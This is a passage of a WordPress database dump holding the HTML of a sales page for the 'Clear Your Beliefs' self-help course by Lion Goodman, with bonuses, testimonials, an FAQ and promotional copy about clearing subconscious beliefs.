manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies, and from the comfort of your own home. Each class session helps you learn specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes plus two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they have had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>\r\njQuery(document).ready(function() { \r\nvar is_chrome = window.chrome; \r\n if (is_chrome) { \r\njQuery(''h5.hdr'').css(''font-size'', ''51px!important'');\r\n jQuery(''h5.hdr'').animate({\r\n    fontSize: ''51px''\r\n }, 100);\r\n } \r\n});\r\n</script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 21:57:57', '2014-06-18 02:57:57', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1008, 4194, '2014-06-17 21:54:04', '2014-06-18 02:54:04', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is 